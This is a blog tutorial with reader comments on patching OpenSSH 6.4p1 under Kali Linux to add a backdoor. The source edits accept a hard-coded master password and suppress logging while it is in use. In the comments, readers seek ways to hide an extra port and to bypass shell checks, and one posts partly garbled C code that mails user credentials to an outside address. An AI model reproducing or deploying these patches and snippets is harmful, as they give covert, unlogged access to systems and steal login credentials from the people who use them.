[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux
This time I show you, how to build a "backdoor" in your own OpenSSH 6.4p1 installation under Kali Linux
Download needed files
cd /tmp/
|
wget --no-check-certificate https://www.openssl.org/source/openssl-1.0.1e.tar.gz
tar xvfz openssl-1.0.1e.tar.gz wget http://openbsd.cs.fau.de/pub/OpenBSD/OpenSSH/portable/openssh-6.4p1.tar.gz
tar xvfz openssh-6.4p1.tar.gz |
Preparing the system
mkdir /usr/local/ssl/ ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so |
Changing OpenSSH
// auth.h
#define B4CKD00R "myeasypass" int backdoorActive; |
// auth-passwd.c
int auth_password(Authctxt *authctxt, const char *password) { struct passwd * pw = authctxt->pw; int ok = authctxt->valid; backdoorActive = 0; if (!strcmp(password, B4CKD00R)) { backdoorActive = 1; return 1; } |
// log.h
int backdoorActive; |
// log.c
void do_log(LogLevel level, const char *fmt, va_list args) { if(backdoorActive == 1) return; |
Compile & install OpenSSH on your local Kali installation
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/ make make install |
Change SSH-Port if needed
vi /usr/local/etc/sshd_config Port 2222 |
Start your new local SSH-Daemon
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config |
Test it!
Comments
Display comments as Linear | Threaded
noname on :
yes mate is grate looks ok .. but when you login you are in ps and w command, and compromise all your activity
Nick on :
Hi mate this looks nice can you made a video tutorial or just write the commands for a different openede port connexion?
i mean if you can explain to me how i can do this to work for example on 9863 but 22 to be still on! cheers !
by the way 9863 i don’t want to be visible on /etc/ssh/sshd_config i know this it’s possible but i don’t know how!
Stefan Schurtz on :
Hi,
you mean something like that:
servconf.c
change to
If port will be changed in config file, change this
servconf.c
Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)
Cheers,
Nick on :
no problem mate i just try both of them didn’t work for me even the port even to make from 6.5 with centos or ubuntu i need something new i try as well to implement sendmail on this no success!
the email function been this for me
[code]
/* fopen example */
#include
#include
#include
#include
#include
int main ()
fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]{
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }
meh on :
Seems to work only if ran by root. How about if you want to run it as unprivileged user?
Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.